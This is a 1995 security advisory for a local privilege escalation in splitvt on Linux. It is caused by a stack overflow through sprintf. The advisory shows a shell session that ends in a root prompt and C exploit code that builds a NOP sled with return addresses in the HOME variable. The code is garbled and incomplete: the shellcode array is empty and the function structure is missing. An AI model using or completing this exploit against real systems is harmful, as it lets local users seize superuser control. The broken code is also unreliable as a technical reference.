Avalon Release

root (root@crimson.cadvision.com.crimelab.com)
Sun, 3 Dec 1995 22:52:37 -0700

                      Avalon Security Research
                            Release 1.3

Affected Program: splitvt(1)

Affected Operating Systems: Linux 2-3.X

Exploitation Result: Local users can obtain superuser privelages.

Bug Synopsis: A stack overflow exists via user defined unbounds checked
user supplied data sent to a sprintf().

crimson~$ cc -o sp sp.c
crimson~$ sp
bash$ sp
bash$ splitvt
bash# whoami

Credit: Full credit for this bug (both the research and the code)
goes to Dave G. & Vic M.  Any questions should be directed to
mcpheea@cadvision.com .


long get_esp(void)
__asm__("movl %esp,%eax\n");
  char eggplant[2048];
  int a;
  char *egg;
  long *egg2;
  char realegg[] =
  char *eggie = realegg;

  egg = eggplant;

  *(egg++) = 'H';
  *(egg++) = 'O';
  *(egg++) = 'M';
  *(egg++) = 'E';
  *(egg++) = '=';

  egg2 = (long *)egg;

  for (a=0;a<(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x30;

  egg=(char *)egg2;

  for (a=0;a<0x40;a++) *(egg++) = 0x90;

  while (*eggie)
    *(egg++) = *(eggie++);
  *egg = 0; /* terminate eggplant! */

